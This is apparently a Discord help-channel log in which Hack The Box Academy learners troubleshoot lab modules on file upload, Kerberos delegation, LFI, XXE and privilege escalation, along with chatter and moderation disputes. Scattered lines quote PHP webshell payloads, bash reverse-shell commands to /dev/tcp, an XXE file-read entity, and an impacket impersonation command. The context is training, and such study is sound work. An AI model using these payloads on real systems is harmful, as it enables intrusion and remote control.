#modules
1 messages · Page 369 of 1
marci out here performing psych analysis based on questions... don't even need OSINT
lmao
Habits
You went through every stage of grief in <5 seconds lol
File upload attacks, whitelist filter
So basically I need to fuzz file extension to get a shell.
The module says to use Burp Suite and see the length of each response, but I don't understand one thing. There are only two lengths for this question, 226 and 227
Most are 227, so why don't the extensions that gave me 226 get accepted?
I'm checking extensions manually
Bc both lengths give me "only images allowed"
we were literally just talking about changing the permissions
look at the messages above
@quasi wave
ok
were literally saying this
I didn't see that hold on
You're looking for a slightly different message
Iirc you can order responses
I.e. large > small
Clicking the column name at the top
Lol no worries, just make sure you write down the answer for future use. This will happen every single time you try to ssh into a machine if you get a private key. It's very fundamental.
What if I told you 90% of my help the past few weeks is straight from memory
You gotta have a background in psych or something
i would get so frustrated at some point lmao
A passing interest
Any experience with social engineering?
3/5 on my AP psych exam in HS and my cybersec degree had me take a psych 101 course
People are just as important a factor (even fictional people in the case of HTB Academy targets) as the machines themselves
Like a lazy admin reusing an rsa key for root
That one got a promotion to client
I am playing with chmod but what chmod number do I need to give it? I have tried 700, 444, and 711
644 also won't work
because that's what it was before
google the error message, youll find the answer
Of course, so if 644 is too PERMISSIVE you have to make it more restrictive.
mans should really google before asking here
As I said earlier, X00 should work, [1,2,4]00
Also suggest removing it from your .ssh folder
Also what do you mean by it 'not working' with 700
If a key file is pw protected you'll have to input the password when using it, like a pw protected zip file
you want to, and should, search what the numbers mean, the permissions, like xwr
I've provided some documentation for you @quasi wave . That should explain everything for you as far as linux file permissions and what the numbers mean.
Yours are too open, you need to make them less open for other users on your system.
Again this is basics he should have learned at some point
And should have taken notes of
Anyone available for a quick nudge with the Intro to HTTP attacks TE.CL exercise? I've implemented the exploit as per the guide but I am getting an "Invalid HTTP Header: '0'" error message; for some reason it's parsing the size declaration of the empty chunk as an HTTP header
ive been at that stage too tbf, when i started hacking, can't really judge him tho
I can
i think everyone has
😟
Yeah, but he's a noob lol. Back in the day we used to get told RTFM and ST*U. It's a different world
I'm still like that... skipping around, at least I know SOME fundamentals though
It'd be different if it wasn't stuff he was told to take note of 1+ year ago
crazy how you remember
Yeah I don't have the context that you do, so I can definitely see your point. Annoying and frustrating.
I can't remember what I had for breakfast yesterday
lmfao
Again. If I remember, it's a problem.
Same
probably some people will never learn?
yay I'm logged in as mike via ssh
good job
There you go!
Nah, I believe Mark can learn
It's why I'm actually helping instead of just "LOL good luck"
Which i have done with people in the past
what would cause you to do this to someone?
Fixed mindset individuals
Complete obstinance, and only wanting answers not the path to the river.
Lead a horse to water and what not
Helping others here is also selfish to a degree, helps keep myself sharp by helping others
I got root password
Richard Feynman did say the best way to learn is to teach
I finished challenge
good job
did you: TAKE NOTES?
im sure he did
If he didn't he'd be back here in a year asking the same thing about ssh keys
See ya in a year!
i mean, he probably didn't know that is needed for id_rsa, but im sure he does know now!
gg
I remember not knowing that though. He's in a good stage of learning. This is where you either stick it out or quit not too soon after, and if he's been at it for a year, that's not really a bad sign.
That's a + in my book, but I also don't know anything other than the 20 minutes I've been here. So that doesn't really mean much.
that's what im saying, i know everyone has been through some stuff like that, and not knowing exactly why it needs to happen. if you just go like okay it'll be like that, you just forget it, ifyk what i mean
Google goes a long way
i know, that's just a skill itself tho, researching, problem-solving. (hacking is just solving problems over and over again). some ppl got to put more effort in than others
I mean I learned this concept recently, reading through 0xdf's writeups
i mean ~1.5 years back, i didn't even know how to connect to the vpn (i tried all my efforts, but couldn't manage to connect) so i couldn't start htb/thm, so i grinded portswigger labs 🤣
yes
I feel like learning how to learn is a skill too, right? I think that kind of plays into learning "how to google". That's fundamental
learning how to learn is a form of intelligence in and of itself
lmao good skill to have
Agreed, also pretty sure academy has a learning process module for this
Learning process is hit/miss tbh a bit of pseudoscience as well in it
I just skimmed through most of it...the questioning part was interesting though
true, i usually compare hacking to math (for example), like you can learn all the theory, but if you don't know how to actually do it, it'll be completely useless. learning hacking is just by doing it
ig that's personal tho, everyone learns diff i know
In a closed system where the only issue is your own skill
and if you can't, you go here to ask marci
Don't ask me specifically
I'll respond if I know. But if it's in the reading I'll straight up tell you to just read
teach us oh great experienced one
Most of what I know is what I read and applied from the modules, a handful from other sources
I should really stop procrastinating on modules...
same, mostly i just do the SA, checking if i know the contents or not, and if so i'll skip the rest of it
im really lazy
I would probably read it. It's really really good info. Trust me. There are little nuggets in there.
Yeah sometimes there's bits of info in there, like the process to identify something -- not just how to exploit
Even some administrative stuff, (how to configure) that really helps you put yourself in the mind of the Admin and what might be going on in the background that you don't necessarily see.
So when you're outside hacking your way in. You don't necessarily see everything thats going on explicitly. But you can intuitively guess whats happening by the responses you get. In other words you can see what you don't see.
It talked about that early in one of the modules.
Yup
good point, all the sections are important, but it's just me being lazy, not that the other things are irrelevant or so
Yeah i get it, and to be honest, if the information wasn't that great, I would lose interest and wouldn't read the whole thing. Just skim it. But since it's actually useful information it caught my attention and I'm reading it. I'm not a huge reader.
hi
i will say that the modules are interesting enough to keep me reading
how is it going ?
struggle
complain
the thing you struggled with/complained about is mentioned in the reading
So rn i am NOT looking for a way to upload files with php code?
Bc the only thing I see for every response is "only images are allowed"
You're looking for something that is accepted
The section should tell you what list to use
I literally get "only images are allowed" for all lists. I did not get one single file accepted from
Webxtensions.txt
Extensions.lst
Bash script with all of php extensions added at line 2 aka wordlist.txt
There should be just a list provided with the php extensions
I'm doing the RBCD (Linux) section from the Kerberos Attacks module. I've correctly created a machine account, and added the correct SPN. When I try and get the ST to do the impersonate I get this error:
```
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
[-] Kerberos SessionError: KRB_AP_ERR_BADMATCH(Ticket and authenticator don't match)
```
Is this a timezone issue?
Yeah looks like tz issue, faketime may work, you may have to disable auto time syncing in the vm to host
Exact same error:
```
faketime "$(ntpdate -q 10.129.44.160 | cut -d ' ' -f 1,2)" impacket-getST -spn CIFS/DC01.INLANEFREIGHT.LOCAL -impersonate Administrator -dc-ip 10.129.44.160 inlanefreight.local/'HACKTHEBOX:Hackthebox123+!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
[-] Kerberos SessionError: KRB_AP_ERR_BADMATCH(Ticket and authenticator don't match)
```
Perhaps a problem with the version of impacket?
hey folks, I'm looking for some help with Kerberos Attacks Module > Unconstrained Delegation - Users section. I've attempted to run through the lab a number of times and ways but keep running into the same problem. I even followed the solution guide but it doesn't seem to work either. The issue I'm running into is when I run the printerbug.py command I'm not getting an acceptable TGS. I've tried this with dementor.py as well but with the same result. I'm not sure why this is failing 😦
(and yes I'm using the full hash)
I also had this problem, sorry, I don't know how to fix it. I ended up going back to Windows to finish the section.
same, in the kerberos module i skipped the two sections that are from linux
https://github.com/dirkjanm/krbrelayx/issues/10
Maybe try adding host flag?
Hello, help me please; I am reading a blog; Use secretsdump, get machine account (computer.test.com) aes256 key & lm:ntlm hashes; Add a DNS A record for my attacker machine. For ex. attacker.test.co...
I just returned to windows section to solve them
I guess that would be a workaround. That makes sense since windows natively supports NTLM authentication
wow glad to see I'm not crazy and this is a more common problem. I'll try playing with the host flag and report back
And let me know if you have the same issue I'm having with the RBCD section on Linux too
just checked my notes; I was able to get this to work. ping me if you want to chat in more detail
oh if you're having a time sync issue (I've had that a few times on HTB machines) I always solve it with sudo ntpdate $machineIP
That didn't work.. I don't think it is a time issue, the time issue is usually CLOCK_SKEW
depends what's throwing the error tbh but yeah
Yeah for the krbrelay scenario, it uses NTLMSSP as a backup for when Kerberos doesn't work. Kerberos is very time dependent, so if there is a clock skew and it doesn't work it will use NTLMSSP in this case, but if it's not supported or disabled, then it will just throw the Unsupported MechType error. At least that's what I gathered. @brittle arch you might be facing a separate scenario.
hmmm well now that you say that I didn't try syncing my time... let me give that a shot
I don't know what my issue was.... but.. I just reset the instance, did the exact same thing and it worked.. so fml I guess?
Idk, these are old protocols old stuff going on, a bunch of MSFT nonsense to go on top of it. Just a recipe for disaster really lol
typical Microsoft really
Imagine taking a dump 40 years ago, letting it sit there for a good 20 years and just adding more and more on top of it until you get a nice heaping pile. A mix of old and new. And then make it proprietary and call it Windows
Instant trillionaire.
NTLM was recommended to be disabled like at least 10+ years ago; and well here we are
Yeah well governments won't allow that because they are still using windows xp lol
Windows 3.1
Yeah and I bet you it does something crazy like launch missiles on an aircraft or something. Because, why not. 'Murica
hello, i know this is not the right channel to ask for help, but i am not able to chat in the general channel, it shows "you don't have permission to chat". how can i get that?
As with any discord server, read #welcome
||#welcome||
That lights up like my Christmas tree
ok it worked thanx a lot
thanx
Is anybody having problem with smbmap on "Attacking Common Services " module?
i never used or needed smbmap on that module
Oh, ok
Bcs it is showing the smbmap command, and i wanted to try it out, but i don't get any output. all i get is that the connection is established, but that's it.
i'm assuming you're using smbmap against the spawned target
maybe respawn the target
¯\_(ツ)_/¯
Ofc
a fair bit of time HTB will snip output that's not relevant
I can ping it, and i can do nmap scan on it
can you do smbclient -N -L //ip
Oh, ok
I will try it now
as that's literally the command above it
Yes
then it might just be an smbmap issue ¯\_(ツ)_/¯
multiple ways to perform the same thing, i wouldn't get stuck too much on it
are you using the apt binary or a cloned github version?
i'm using the one installed in parrot and it's showing the same info
try reinstalling it?
sudo apt reinstall smbmap
try sudo apt remove smbmap; reset your vm; reinstall it
Not working, will try now with github version
does it matter? there's like a billion ways to list smb shares
No, not working
I had the same issue, so i used only smbclient & crackmapexec . are you using kali linux in ur local vm ?
yes
crackmapexec's outdated, recommend netexec
netexec didn't work tho
nxc smb <target> --shares
didn't work?
most of these tools didn't work for me in the kali vm
i recommend u use pwnbox @formal sphinx
that sounds more like your kali is borked
did you like... use the academy vpn?
i tried github version, downloading from apt, and everything
cos I have fucked up before using the lab vpns for academy
all versions seem to have some issues for me , 🙂
he can use the smbclient command
smbclient works tho 🙂
which reminds me: time to update everything on my VM
Problem is that i was using parrot on previous laptop, and on new one i can't use vmware properly
It runs well for about an hour and then the performance drops a lot until it freezes completely
nxc worked fine for me
if it's a linux smb issue, you CAN use windows, it has the benefit of using file explorer as well for smb shares
target is working as intended for me using pwnbox/parrot ¯\_(ツ)_/¯
sounds like something potentially broke during an update or requires an update
Hey I'm trying to find the parameters for this Skills Assessment - Web Fuzzing. I got the parameter but I can't seem to find the others.
@fathom pendant You are using pwnbox as vm?
yes
are you sure there's multiple parameters to fuzz? i seem to recall only one
(and iirc it tells you)
It also says "This method is no longer used" when I curl the page
The question is: In the page from the previous question, you should be able to find multiple parameters that are accepted by the page. What are they?
So I assumed that there's more than one.
what module?
because that's not the web fuzzing module skill assessment...
https://academy.hackthebox.com/module/280/section/3140 <-- this is what i see for the "web fuzzing" module
unless you're talking about a different module
ah that module is "attacking web applications with ffuf"
Whoops
there should be two params there
if u use the right wordlist , u should be able to find it
yes there's 2 parameters, just because a method is no longer used doesn't make it invalid
it could still be usable; but updated to a different one
Will download it now and run it, hope vmware doesn't freeze as usual 🙏
you can't download pwnbox
you can download the htb-edition of parrotOS, but that's not the same as pwnbox
That's what i am downloading
if i download it, will tools like impacket be there, or should i download them myself?
impacket should be preinstalled
as another hint; the final question refers to using the POST method to submit via curl (this is important for how you'll fuzz)
"In general, there are two types of services: internal, the relevant services that are required at system startup, which for example, perform hardware-related tasks, and services that are installed by the user, which usually include all server services."
what does "server service" mean in this context
server just refers to a computer that serves something, therefore server services refers to all system services that aren't there by default like an http server, an ssh server, etc.
so network related servers,
doesn't have to be network related, it could serve something just internally
like mpd
over localhost?
ye
And just like that. I finished it in like 2 seconds lol
Figured I'd throw that bone to you bc i was like "how did I solve this the first time" turns out:
The key info was in the question
having played multiple trading card games: no... reading it doesn't always explain the card
It's mostly a meme tbh
Yu-Gi-Oh be like that
istfg yu-gi-oh
Wall of text: the card game
sometimes a card's functionality isn't on the card but buried in a card that was banished like 2 rounds ago
Lmao. Appreciate it! YuGiOh players definitely don't read 😛
That's cos half the time we face meta players and know their exact combo
is Security Edition the same as the htb edition? cuz when i try to download it gives me two choices, Home and Security Edition
i believe the only difference is the theme, the htb edition is just themed like the pwnbox/htb
the benz, the benz, the purple, the green the yellow the white cocaaine the white
hi tech
hi tec
hi tec
bro's drunk
tf is that supposed to mean?
it's the new hashing algorithm VSHA-512-69 where V stands for very
yes
they become much more of an issue because those networks are probably connected through cables to the main gateway (border gateway) router of the company?
or because mitm work on mac addresses but not IPs?
They become more of an issue because it's much easier to attack a network from within it
and rarely are networks with active hosts directly connected to the gateway router, there's usually a chain of em
sry, dumb question but it's confusing me, what does "host" refer to in networks? is it like a server?
anything connected to the network that isn't a network device(i.e. router/switch...etc)
aight
oh aight
so the host is a guest
user, client
yes, got it now
i keep having this issue on the "responder" module, is that normal?
responder module? do you mean box?
yeah mb
WHY CANT I TYPE IN GENERAL????
Hi everyone, I am currently doing the fourth module of CDSA, Windows Event Logs and Finding Evil . Did anyone here face any issues while solving the answers to the questions of this module?
Did you solve it?
who tf changed my name ?
its not randomized
and its chaos
don't look at me man, I don't have perms
np ofc not
WHO CHANGED MY NAME
DONT LET ME @ EVERY SINGLE MEMBER
Because your name did not abide by the rules.
what rules
Stop the caps and an at everyone won’t work
bro its chaos
The rules you’re supposed to read when joining a server
i have read them
It’s non English characters
Read Rule #10
Identify yourself with your identifier and it will open the general chat for you
And then your HTB username will be shown
Account identifier can be found here: https://app.hackthebox.com/profile/settings
No
I TOLD you for god's sake i said i couldn't
And why is that?
idk say error
Try again
XD man
bro fuck you, you're just bullshitting me. ban my ass idgaf
You didn't even try, did you?
fucking clown
i did
and the slow mod is just sitting on my nerves
shitty server
rename me back
calm down
Being mean to mods isn't very nice
i dont need some one to teach me
Well, it’s three simple steps to identify yourself
Only you can rename yourself with a verification.
explain my name being changed
Violation of rule 10
OMG
well im asking you do the same
just name me CHAOS
Verify yourself so you can get your name changed
i said there is an error
We can’t. Also, you asked to type in #general. You’re the only one who can identify yourself. If you get an error, tell us which one
it shows caps ERROR
You have to rename yourself. Your HTB username will be your Discord username.
Then you didn't verify yourself properly
Dm me a screenshot if you want.
Man, you mods must have some helpdesk experience dealing with karens XD
im not i just want my name bro wtf
i will report non English name as racism
No
not hard
YOU CAN
Identify yourself. If you don’t wanna identify yourself , that’s on you.
One last time. We can't rename you. You have to rename yourself. Your HTB username will then automatically become your Discord username.
Other than that, this isn’t a channel to chat. This is a channel for module help
You need to verify to talk in #general
Buddy. We told you to identify yourself. Only then you can talk in general chat
i said i tried
And I told you to dm me the screenshot of the error
If u want to be helped, listen to the ones trying to help
just please i dont want to be mad, i get mad so much and i have a heart condition
I’ll be waiting for that screenshot.
Then let us help you. Verify your user and you will have the desired username and access to #general
Account identifier can be found here: https://app.hackthebox.com/profile/settings
XD Shut up
i made a new account
what now?
hey guys I got a question regarding LFI and File Upload module. For LFI I noticed we use <?php system($_GET['cmd']); ?> and call the cmd parameter with ?cmd=<command>. For file upload instead we use <?php system($_REQUEST['cmd']); ?> then call it with &cmd=<command> instead. The question is why ? I tried the file upload payload for LFI and it does not work. Is it something related to php ? I do not get it.
The main difference between these two is (based on the text you wrote, module has been a while for me)
$_GET will only take the parameter from the url. $_REQUEST can also be a POST.
The difference between the ? and & is that the ? is the first parameter. So for your second one it will be ?someparameter=somevalue&cmd=<command>
hmmmmm, I see still strange that $_REQUEST would not work for LFI then
Which module and section are you working on? I’ll try to have a look on my phone
maybe it's finally time to go through w3schools php section, been putting it off for a while
It's specifically related to all the LFI assessments in the module. All the webshells I got working used $_GET. I could not get a single one to work with $_REQUEST. They do specifically show you to use $_REQUEST for File Upload webshells and $_GET for LFI webshells. But they never explain why
Anyone manage to get the petit potam exploit working in the Bleeding edge vulnerabilities section of Ad and enum?
I got the other two working just not petit potam
I get to the Requesting a TGT using gettgtpkinit.py step then it fails to get one from the kdc
hello, anybody did Game Reversing & Modding ?
I am stuck at Building a Runtime Hook
Hey guys, i'm stuck on the Windows Event Logs & Finding Evil module. i'm trying to do a DLL hijack on calc.exe like in the module; the problem is that i can't move calc.exe from the system32 dir. i can only place my malicious dll in the dir, but i can't name it WININET.DLL bcs there is already a file named like this, and i can't delete it either as i need higher rights. can somebody help?
hi, has anyone done this section? save me time please, what wordlists do you use?
Try to copy the calc.exe from system32, not move.
just tried it it worked ^^ thanks
guys, how to know if a box is buggy or it's a skill issue
When in doubt, I'd assume it's a skill issue.
for example i was doing a machine for Attacking Common Services and the ftp service was bugged, it just didn't show the available files on the ftp server. i was banging my head against the wall and after 3 restarts it finally showed them
Did you wait a few minutes after starting each time? Some boxes take a few minutes to fully start up.
the first one yeah i made around 10 scans just in case
Scans? You said that the server did not display the files.
ftp server
i scanned the machine ftp server around 10 times and the scan never showed available files
Yes, but why scans?
You log in and the client then shows you the files on the server.
well the third scan did show the files
can i paste what i am talking about to better illustrate my point? since i don't want one of the mods to warn me for pasting module content
please send me a dm
ok
Unity Mono Win x64 6.0.0-be.672
Hi guys, happy holidays for everyone !!!
Anyone here who did or is doing the Underpass machine?
I did it
Best to ask in #1320087957612265574
?
Hello, excuse me, i am experiencing a weird issue, which is connecting to the machine's website
it would work at the beginning but then, the connection dies
like after 2 minutes or so
i think in this specific module only but i don't know
which is get started
are you using a vpn?
question. if i create an alias in my bash folder, will it be able to be used in the vpn session
so many new accounts on here lately
i hope this isn't a stupid question but im new to HTB.
can someone explain what it wants me to do here?
ah you are logging in via ssh
yes. is this a task im supposed to do?
did you spawn the target (if there is one) a little bit lower on that page
oh yhh i spawned it
try to ssh into that target
what's the download file for?
that's for when you want to use your personal VM
but if you are using HTB pwnbox then you don't have to download that file
oh so i can just ignore it, spawn the pwnbox and answer the questions below here right?
yup!
ssh 10.129.127.54@htb-student
its like this right?
errrr
anyone know why on the bleeding edge vulns module, when i want to execute print nightmare, msfconsole won't bind to the IP? [-] Handler failed to bind to 172.16.5.225:8080:- -
[*] Started reverse TCP handler on 0.0.0.0:8080
It worked now i got it in the wrong order 😆
lol you are now on your way lil hacker
ok what am i missing.
probably the unit name with the description
so do i need to pipe that into find
well. look at your command. is there a command to list ALL the units?
ah
Don't share answers
If it highlights green, the answer is correct
No
how come i didn't receive a cube, whereas for the bottom answer i did receive a cube?
cause it said +0
ahh ok i see now
can i dm someone for help with the bleeding edge vulns module
Im stuck on this one Burp Intruder. I get 404 back for every request sent -
https://academy.hackthebox.com/module/110/section/1054
Can anyone help?
Are you fuzzing for /admin/page.html?
still no luck; any additional help would be greatly appreciated
yeah, one sec will get a screenshot
The question tells you which directory to start with
Did you also try sorting by response size?
Or status code
Ah you did something wrong
Look at your request
It's requesting /page.html
Not /admin/page.html
But shouldn't it go from Admin from the target i provided
or does that have to be in the request header too
It has to be in the header
ah 🤦♂️
Your setting should autoupdate it
thank you one again Marcilee, i will make the change and fingers crossed its one of the first results
But idk why it isn't
So this should work?
Should
try it and see what happens 😄
haha the thing is @vague dust you can sit there for hours and get the same results because it's throttled to 1 request per sec
i know, i did at least half the bug bounty hunting path.
In Footprinting lab, Medium, I can't cd into the TechSupport folder, it says "Permission denied". I did use sudo when mounting the network share: sudo mount -t nfs 10.129.212.78:/ ./target-NFS/ -o nolock. It has "nobody" and "nogroup" as ownership.
Move around as root
did you do the lucky button yet?
when you do. let me know how that goes lol
the AD one is already a slog, i was hoping that would be the worst of it
thank you. i still had to use grep to find the answer though
yay you found a work around!
i am sure there was a better way than systemctl --all list-units --type=service | grep -i [apparmor]
worked thank you, that Burp update has confused things, looks simpler on the screenshots from the module material
did you try condensing it? see what works and what doesnt work?
i did not, i am having a hard time understanding the man page.
I need help with the web attacks local file disclosure module. I've tried <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php"> I've also tried a few different paths but I can't seem to get the encoded file
You don't need to specify the .php
it still doesn't work
I mean are you calling &company; anywhere?
yes
i don't remember reading anything on the theory pages that i can refer to to answer this question?
does this mean i should research the answer on the internet ?
in the email field
I remember mostly just copy/pasting that module
i verified that xxe vulnerability is there
nope. you need to find the answer in your terminal.
Nope
There's a command that helps you find __env__ironment variables
im assuming there's a command that helps with this, but none of the theory pages referred to finding the path to the user's mail?
have you tried checking and seeing what env does?
ahhh
My hint was more subtle
what would you have recommended for the grep
yeah i botched that one. sorry
so just for future reference, the answers to all future questions are in the theory provided, and i shouldn't ever have to look them up on the internet or do further research
right?
IF you do look up on the internet dont look up the module look up the METHOD you are trying to do. example: what command do i input in powershell to ignore scripts
im still trying to attack the server in this module to let me get a cert 😿
how to practice the learned things in academy using free htb machines
like is there a site or something from which i can see which topics are for a machine
i found out what it was, it wasnt formatted correctly
Rado35 you can use the Academy x HTB Labs feature to find out the knowledge required from modules to solve a certain machine
The free labs don't have tags. The academy x labs feature only shows retired machines
guess i will have to buy a subscription to practice
or are the free ones good enough
if you have a student email they have a student subscription
for boxes too?
i know for academy
its mainly academy from what i saw but you get access to more modules than a free sub
isnt it only for academy
Which shell is specified for the htb-student user?
for this question do i write the path ?
what is the question asking you
which shell is specified ?
Academy only has a student sub
yeah
That can be found in env
you're going to have to do a little digging for that one. the answer is closer than you think
i found it in env but it gave a path
Yeah and?
so i thought
Did you try or just assume
is the vip enough
you are going to find out alot of the answers are there without you realizing it.
since i wont be taking the exams for the role paths but i wanna do some labs to see what i have learned from academy
my only concern is that boxes are too ctf-ish and not really real world
each machine or challenge tries to teach you something
im finally done with that module 
In my experience, i did not come across a single CTF-ish machine in HTB.
thats good since in thm most i did were like that
although i didnt do a lot
Lol yeah i can agree on that, i moved from the platform mainly because of this.
I did around 140 machines on THM, most of them were CTF-ish
in "Pivoting, Tunneling, and Port Forwarding" module "SOCKS5 Tunneling with Chisel", in Building the Chisel Binary and Transferring Chisel Binary to Pivot Host, the chisel binary works in my parrot machine but it doesn't work on the ubuntu pivot host. it shows the following error --> ubuntu@WEB01:~$ ./chisel --help
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
this is the error screenshot for reference
hope all are doing fine
I just wanted some guidance regarding cybersecurity like from where should I start any insights you all wanna share
theres a htb bible lying around here somewhere...
HTB Academy obviously :p
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Try Compiling the binary again with -static flag
just now noticed, thank you
yes, i am
Can anyone help with the bleeding edge vulns module in AD attacks and enum
ok once again i am missing something
well it says newline....what would cause it to read as newline?
i am not sure what that even means
maybe google the error message?
Why are you doing <thing>
< and > are special characters in bash
i am trying to combine what ive learned to help in other modules. is that not the correct syntax
i think she is hinting at what to type in google
Sometimes (most times) syntax that's shown with any kind of brackets, you drop the brackets
i think i forgot to escape is that correct
ok how do i drop the brackets
🫢
please do, it might stick better
Use your brain to think of what "dropping" can mean
ok i removed the brackets with zero results
did you get a new error
i did not
so what does that tell you?
why?
because there is no target in the vpn section
is there a target at the end of the page?
Ah you figured out the secret
I was waiting for you to realize
lol
still no results and no errors
🤦♂️
heres a hint. are there questions you have to answer at the end of that section?
Perhaps there's a simpler way to check dconf.service
even using find i get permission denied
what section and module is this? i wanna see
task scheduling linux fundamentals @vague dust
can someone help me with the web attacks blind data exfiltration module? I set up the listener and I don't get a connection when I send the request to /blind/submitDetails.php
Can someone direct me in the right direction in the Injection Attacks module. I'm unable to connect the dots
LDAP - Data exfiltration and Blind exploitation. I followed as the module says but I couldn't get any ||char|| other than ||*||
@fathom pendant @vague dust
Are you trying to read out the right data?
According to my understanding I'm supposed to get use description attributes to get all the chars
@vague dust @fathom pendant
Tip; you throw the 2> /dev/null on the find command
I used burp intruder to get the chars but I'm missing something because I get some different response but size is 0. Like I couldn't figure out the logic for it
Might just be borked #1234357888114364508
First find a payload that works. Only then can you try to read out the characters.
i am gonna have to agree with you i guess ill use google to find the answer
Make a post in #1234357888114364508
i had to bust out my VIM cheatsheet lol
whats the best way to remember all this stuff we learn
Imagine needing a cheatsheet for vim
Notes and practice
nano ftw
Okay thanks I'm going try it again
Also take a look at the cheatsheet in the module
done
ok so for the medium lab for Password Attacks module I did an nmap scan and found SMB was a way in. I used crackmapexec to get the username and password for SMB. I am trying to log in with that user via smbclient but its giving me an error. I looked up the error but I am not understanding people's solution on how to solve it. Here is my command:
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-kvcwjpxhxm]─[~]
└──╼ [★]$ smbclient -L 10.129.192.129 -U john
Password for [WORKGROUP\john]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
SHAREDRIVE Disk SHARE-DRIVE
IPC$ IPC IPC Service (skills-medium server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
I am thinking do I need to specify the IPC share?
is that my issue?
Why do you need the ipc$ share?
I need to log in as john
Hack the box CTFs and academy, bug bounties, THM etc
but why won't it let me log in?
do they have ctf for web penetration
With smb you need to specify the share you're connecting to
You can't just connect to the root
has anyone in here finished windows lateral movement (Winrm)
Sometimes
Connect to DC01 as Leonvqz and read the flag located at C:\Users\Leonvqz\Desktop\flag.txt
i think i found it.
Hi guys, is it normal that its seems impossible to get a revshell on File Upload path? I get code execution but never a revshell.
File is:
<?php system($_REQUEST['cmd']); ?>
shots taken are:
94.237.54.116:33750/uploads/reverse.php?cmd=bash -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1
94.237.54.116:33750/uploads/reverse.php?cmd=bash -c 'bash -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1'
Its driving me crazy, no much space for mistakes lol, 1 command
It's normal
A call like:
94.237.54.116:33750/uploads/reverse.php?cmd=whoami
Works perfectly fine
Why is that?
You're attacking a public ip. Not private
oh lord that is true
As far as I know, Docker containers (Target machines) have no way of contacting anything outside their network
You'd have to do some port forwarding shenanigans to get a revshell, which isn't recommended
it's also why it directly gives you a port 😉
100%, I was hitting my head against a wall without even looking at it
ok for the medium box I cracked the file and logged in as jason
so from here do I need to do credential hunting?
in order to find root password?
root is the end goal; there may be many steps in between
do take a note of what led you to j*
the documentation mentions something which may be helpful :)
ok
@quasi wave Just so you know, in case you have heard the term but don't know what it means. The processes of going from the user you are ( a lower privilege user) to root (a SYSTEM/kernel level user) is known as "Privilege escalation"
guys
The cyber mentor has a very good linux and windows privilege escalation course free on youtube for beginners. It covers most of the basics
I read rules
Read welcome as well.
I knew what it was just not how to do it
you don't have to do anything fancy to go up
just follow the path in front of you
I found in the document there is mention of database files so I used the BASH for-loop to list DB files but I don't have permission to read any of them
so can't cat any of them out
I wonder what DATABASE service can be used
🤔 maybe some sort of __s__tructured__q__uery__l__anguage server 🤔
ok
gotta abstract some thought sometimes
think of the question for root as Z; so you're not gonna always go directly from a -> z; sometimes you need to go through the alphabet to get to z
again don't assume that the question is telling you the first step
the question is just a goal
ok I'm logged into sql database
stuff you learned from common services should come in handy; from what i recall that comes before pw attacks
so previous module?
but isn't network services section in the pw attacks module?
or do I look back at footprinting module?
well take a look at it this way
what are you currently interacting with
and what do you think would be most useful
by what you learned i meant moreso the enumeration portion
ok
@urban sage sorry for mentioning you! ban mckinnon
he is a scammer that offers hacking services
DM a mod
reach out to mods/admins in dm
if it's related to discord moderation, their dms are open
(alongside providing screenshots)
also be mindful that most mods, i think, are human -- so holiday stuff
Dm me a screenshot. 
Hey is any link how to hack social media
@fathom pendant he sent me a dm asking for help as well
i will!
there's no 2nd host
rsa keys can be password protected
is that to log into yet a different server?
nope
is it for the mysql server?
the one question you should ask; "Why is it password protected"
the mysql server is the target server
so no
and abstract from "why would an ssh rsa key be password protected"
and the realization should hit you of what to try
there's a logical leap
ok
like when you go to unzip a protected archive
this is for an archive ya
ok
guys... i am facing weird problem. i would spawn a machine, then sometimes the connection dies and i have to respawn the machine and sometimes that doesn't even work as well
your questions about what to do are revealing spoilers about the skill assessment
Need some help? Learn how to reach the support team on Academy.
ok sorry
can someone DM me?
or can I DM someone? I don't want to spoil anything but I just want to make sure I can solve this
i'm telling you this: you're on the last step, you just need to make a leap of logic
Hey all
i am at
Linux Privilege Escalation
Miscellaneous Techniques
Review the NFS server's export list and find a directory holding a flag.
i made a shell and compiled it, and when i try to run it on the machine it does not do anything; i dont get root privilege to continue
can someone give a little hint?
ok
hi, is anyone able to help with python library hijacking in linux priv esc? feel free to DM
you won't be able to do everything mentioned
im sorry marcielee were you talking to me or que?
the don't need to do that was to you
Ok in that case I’ve written down everything so will try again in a few hours
Just to give my brain a rest
I’ll try again myself soon
aah ty, i did figure it out thank you
Hello, guys, I almost completed my CBBH modules but still stuck on the SERVER SIDE ATTACK Module specifically in INTERNAL PORT SCANNING BLIND SSRF can anyone help me?
$sudo apt install freerdp
Reading package lists... Done
Building dependency tree... Done
